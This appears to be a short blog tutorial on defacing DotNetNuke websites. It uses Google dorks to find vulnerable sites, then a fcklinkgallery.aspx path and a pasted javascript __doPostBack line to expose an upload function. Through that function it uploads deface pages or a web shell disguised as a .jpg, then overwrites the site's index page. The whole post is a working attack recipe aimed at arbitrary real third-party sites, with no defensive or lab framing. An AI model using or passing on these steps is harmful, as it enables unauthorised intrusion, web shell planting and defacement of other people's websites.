Beginner Hacking : DNN Hacking Tutorial

DNN means Dot Net Nuke.
This is the most easiest web hacking way. I will describe it in some few steps.

Step 1:
Go to www.google.com

Step 2:
Now enter any of these google dorks

inurl:/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx

You will get a result like below:

Google automatically detect vulnerable sites.

Step 3:
Now choose anyone. Suppose I choose www.example.com/Home/tabid/36/language/en-US/Default.aspx

Now replace
/Home/tabid/36/Language/en-US/Default.aspx

with
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Then you will see like below:

Then click on "File"

then paste javascript in the browser which is given below:
javascript:__doPostBack('ctlURL$cmdUpload','')

See the change? You have got a upload option.


Step 4:
Now upload your deface page. Choose the file and click on upload.

Step 5:
See your uploaded file in http://www.example.com/portals/0/yourfilename

Step 6: 
If you want to upload shell then 1st download shell from here
Then choose shell and upload it.
again you can find your uploaded shell from http://www.example.com/portals/0/shellname.jpg

Now you can see the admin. If you want to index hacking then just find index.html or index.htm or index.php
Click edit and paste your deface page source code there. Now save. :D

By this you can fully deface a website.

No comments:

Post a Comment